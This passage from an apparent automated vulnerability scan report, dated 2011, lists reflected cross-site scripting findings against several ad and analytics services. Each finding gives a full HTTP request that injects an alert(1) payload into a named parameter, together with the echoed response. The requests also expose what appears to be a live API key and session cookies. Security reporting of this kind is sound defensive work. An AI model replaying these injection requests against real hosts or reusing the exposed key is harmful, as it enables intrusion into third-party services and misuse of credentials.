GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1391427&pid=755767fdb05<script>alert(1)</script>c67450030ae&ps=-1&zw=309&zh=215&url=http%3A//www.time.com/time/&v=5&dct=Breaking%20News%2C%20Analysis%2C%20Politics%2C%20Blogs%2C%20News%20Photos%2C%20Video%2C%20Tech%20Reviews%20-%20TIME.com&metakw=TIME.com,Daily%20News,,Greece,Protests,Strikes,Austerity,Einstein,Nobel,cosmological%20constant HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.time.com/time/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:16:15 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "755767fdb05<script>alert(1)</script>c67450030ae"

   
                                                           </head>
...[SNIP]...

2.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 9d43e--><script>alert(1)</script>be28fd24e1f was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=13914279d43e--><script>alert(1)</script>be28fd24e1f&pid=755767&ps=-1&zw=309&zh=215&url=http%3A//www.time.com/time/&v=5&dct=Breaking%20News%2C%20Analysis%2C%20Politics%2C%20Blogs%2C%20News%20Photos%2C%20Video%2C%20Tech%20Reviews%20-%20TIME.com&metakw=TIME.com,Daily%20News,,Greece,Protests,Strikes,Austerity,Einstein,Nobel,cosmological%20constant HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.time.com/time/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:12 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3365
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "13914279d43e--><script>alert(1)</script>be28fd24e1f" -->
...[SNIP]...

2.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload ea8d4--><script>alert(1)</script>64e83b686e4 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1391427&pid=755767&ps=-1ea8d4--><script>alert(1)</script>64e83b686e4&zw=309&zh=215&url=http%3A//www.time.com/time/&v=5&dct=Breaking%20News%2C%20Analysis%2C%20Politics%2C%20Blogs%2C%20News%20Photos%2C%20Video%2C%20Tech%20Reviews%20-%20TIME.com&metakw=TIME.com,Daily%20News,,Greece,Protests,Strikes,Austerity,Einstein,Nobel,cosmological%20constant HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.time.com/time/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:20:33 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3804
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1ea8d4--><script>alert(1)</script>64e83b686e4" -->
   
...[SNIP]...

2.4. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453c5"><script>alert(1)</script>0603925a1fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0453c5"><script>alert(1)</script>0603925a1fd/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0453c5"><script>alert(1)</script>0603925a1fd/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.5. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 199a0"><script>alert(1)</script>df5fd8c38aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235199a0"><script>alert(1)</script>df5fd8c38aa/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235199a0"><script>alert(1)</script>df5fd8c38aa/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.6. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50d2f"><script>alert(1)</script>21443c2e9ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/113160650d2f"><script>alert(1)</script>21443c2e9ce/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/113160650d2f"><script>alert(1)</script>21443c2e9ce/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.7. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a57"><script>alert(1)</script>543e86ef6a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0d0a57"><script>alert(1)</script>543e86ef6a/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0d0a57"><script>alert(1)</script>543e86ef6a/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.8. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a95f2"><script>alert(1)</script>3db595fe01d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154a95f2"><script>alert(1)</script>3db595fe01d/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154a95f2"><script>alert(1)</script>3db595fe01d/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.9. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbf9"><script>alert(1)</script>7d23282b3a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH2dbf9"><script>alert(1)</script>7d23282b3a;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 293

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH2dbf9"><script>alert(1)</script>7d23282b3a;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.10. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebf35"><script>alert(1)</script>9556b7afb58 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001ebf35"><script>alert(1)</script>9556b7afb58 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001ebf35"><script>alert(1)</script>9556b7afb58;adiframe=y">
...[SNIP]...

2.11. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60db"><script>alert(1)</script>bc3a3c9803f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d60db"><script>alert(1)</script>bc3a3c9803f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drudgereport.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d60db"><script>alert(1)</script>bc3a3c9803f=1;adiframe=y">
...[SNIP]...

2.12. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68bb7<script>alert(1)</script>1aa098db945 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.nationaljournal.com%2Fpolitics%2Frick-perry-raises-17-million-in-third-quarter-20111005&callback=_ate.cbs.sc_httpwwwnationaljournalcompoliticsrickperryraises17millioninthirdquarter201110051068bb7<script>alert(1)</script>1aa098db945 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=136|36,57|37,55|38,44|39,46|40

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=4800
Content-Type: application/javascript;charset=UTF-8
Content-Length: 149
Date: Wed, 05 Oct 2011 14:31:53 GMT
Connection: close

_ate.cbs.sc_httpwwwnationaljournalcompoliticsrickperryraises17millioninthirdquarter201110051068bb7<script>alert(1)</script>1aa098db945({"shares":0});

2.13. http://api.bit.ly/v3/shorten [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ccc1b<script>alert(1)</script>98e30e33e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/shorten?login=timeinc&format=json&apiKey=R_e4826431beb6af6b46f2b1222860cdd7&longUrl=http%3A%2F%2Fwww.time.com%2Ftime%2Fworld%2Farticle%2F0%2C8599%2C2096010%2C00.html%3Fxid%3Dtweetbut&callback=__bitlyApi1317824491685ccc1b<script>alert(1)</script>98e30e33e4a HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/world/article/0,8599,2096010,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:21:00 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 308

__bitlyApi1317824491685ccc1b<script>alert(1)</script>98e30e33e4a({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.time.com\/time\/world\/article\/0,8599,2096010,00.html?xid=tweetbut", "url": "http:\/\/ti.me\/qqyC99", "hash": "qqyC99", "
...[SNIP]...

2.14. http://api.bit.ly/v3/shorten [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 37730<img%20src%3da%20onerror%3dalert(1)>18fe03cfb64 was submitted in the longUrl parameter. This input was echoed as 37730<img src=a onerror=alert(1)>18fe03cfb64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v3/shorten?login=timeinc&format=json&apiKey=R_e4826431beb6af6b46f2b1222860cdd7&longUrl=http%3A%2F%2Fwww.time.com%2Ftime%2Fworld%2Farticle%2F0%2C8599%2C2096010%2C00.html%3Fxid%3Dtweetbut37730<img%20src%3da%20onerror%3dalert(1)>18fe03cfb64&callback=__bitlyApi1317824491685 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/world/article/0,8599,2096010,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:20:51 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 311

__bitlyApi1317824491685({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/www.time.com\/time\/world\/article\/0,8599,2096010,00.html?xid=tweetbut37730<img src=a onerror=alert(1)>18fe03cfb64", "url": "http:\/\/ti.me\/q2mqI5", "hash": "q2mqI5", "global_hash": "ngM5KV", "new_hash": 1 } })

2.15. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 15621<script>alert(1)</script>a006cc605e8 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction15621<script>alert(1)</script>a006cc605e8&n=ar_int_p119936314&1317825219171 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620; ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:32:48 2011&prad=71054949&arc=43921375&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:53 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction15621<script>alert(1)</script>a006cc605e8("");

2.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 68b29<script>alert(1)</script>6aabb981620 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=268b29<script>alert(1)</script>6aabb981620&c2=6035728 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/world/article/0,8599,2096010,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 14:19:50 GMT
Date: Wed, 05 Oct 2011 14:19:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"268b29<script>alert(1)</script>6aabb981620", c2:"6035728", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.17. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 56bed<script>alert(1)</script>e111db97095 was submitted in the c parameter. This input was echoed unmodified in the application's response.

